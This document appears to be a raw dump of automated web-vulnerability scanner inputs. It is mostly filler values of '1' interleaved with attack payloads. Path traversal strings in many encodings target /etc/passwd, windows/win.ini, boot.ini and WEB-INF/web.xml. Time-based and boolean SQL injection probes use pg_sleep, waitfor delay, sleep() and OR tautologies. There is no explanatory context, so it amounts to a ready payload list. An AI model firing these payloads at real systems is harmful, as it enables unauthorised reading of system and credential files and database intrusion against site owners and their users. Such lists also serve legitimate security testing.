1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
WEB-INF\web.xml?
1
1
1
WEB-INF/web.xml?
1
1
1
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1
1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
1
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
1
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
1
1
1
1
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
1
1
1
................windowswin.ini
1
1
1
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
1
1
1
../../../../../../../../../../windows/win.ini%00.jpg
1
1
1
../../../../../../../../../../boot.ini
1
../../../../../../../../../../windows/win.ini
1
1
1
WEB-INF\web.xml
1
1
1
1
1
WEB-INF/web.xml
1
/\../\../\../\../\../\../\../etc/passwd
1
1
1
1
1
1
1
file:///etc/passwd
1
1
1
1
1
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
1
1
1
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
1
1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1
1
1
1
1
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
1
1
1
/etc/passwd
1
1
1
1
1
1
1
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1
1
1
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
1
1
1
1
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
1
1
1
1
1
1
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
1
1
1
1
1
1
1
../../../../../../../../../../etc/passwd%00.jpg
1
1
1
1
1
1
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
1
1
1
1
1
1
../../../../../../../../../../etc/passwd
1
1
1
1
1
WEB-INF\web.xml?
1
1
1
1
1
WEB-INF/web.xml?
1
1
1
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
1
1
1
1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
1
1
1
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
1
1
1
1
1
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
1
1
1
1
1
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
1
1
1
1
1
1
1
1
1
................windowswin.ini
1
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
1
1
1
1
1
../../../../../../../../../../windows/win.ini%00.jpg
1
1
1
../../../../../../../../../../boot.ini
1
1
1
1
1
../../../../../../../../../../windows/win.ini
1
1
1
1
1
WEB-INF\web.xml
1
1
1
WEB-INF/web.xml
1
1
1
1
1
/\../\../\../\../\../\../\../etc/passwd
1
1
1
1
1
file:///etc/passwd
1
1
1
invalid../../../../../../../../../../etc/passwd/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
1
1
1
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
1
1
1
1
1
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
1
1
1
1
1
1
1
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
1
1
1
/etc/passwd
1
1
1
1
1
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
1
1
1
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
1
1
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
1
1
1
1
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAucG5n
1
1
1
1
1
../../../../../../../../../../etc/passwd%00.jpg
1
1
1
1
1
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
1
1
1
1
1
../../../../../../../../../../etc/passwd
1
1
1
(select convert(int,CHAR(65)))
1
1
1
1
1
1
1
JyI=
1
1
1
@@0HR5W
1
1
1
9PiL2vuf'));select pg_sleep(4); --
1
\
1
mQMjB6Aw');select pg_sleep(4); --
1
1'"
1
retdAjvp';select pg_sleep(4); --
1
(select convert(int,CHAR(65)))
1
-1));select pg_sleep(12); --
1
-1);select pg_sleep(12); --
1
-1;select pg_sleep(12); --
1
HMhsZyn2')); waitfor delay '0:0:12' --
1
JyI=
1
9dHw88xk'); waitfor delay '0:0:8' --
1
mHGiFpRq'; waitfor delay '0:0:8' --
1
@@GGOnc
1
1 waitfor delay '0:0:8' --
1
-1)); waitfor delay '0:0:8' --
1
-1); waitfor delay '0:0:8' --
1
\
1
1
1
-1; waitfor delay '0:0:8' --
1
1'"
1
(select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/
1
if(now()=sysdate(),sleep(4),0)/*'XOR(if(now()=sysdate(),sleep(4),0))OR'"XOR(if(now()=sysdate(),sleep(4),0))OR"*/
1
-1" OR 2+898-898-1=0+0+0+1 --
1
-1' OR 2+418-418-1=0+0+0+1 --
1
1
1
1
1
-1 OR 2+441-441-1=0+0+0+1
1
-1 OR 2+794-794-1=0+0+0+1 --
1
1
1
X6kr75MT
1
1
1
0
1
0
1
1
1
JGzkBAoR'));select pg_sleep(9); --
JyI=
1
@@VKbgk
1
1
1
1
uffGkUjw');select pg_sleep(6); --
1
1
1
1
1
pKaTZ1qG';select pg_sleep(6); --
\
1
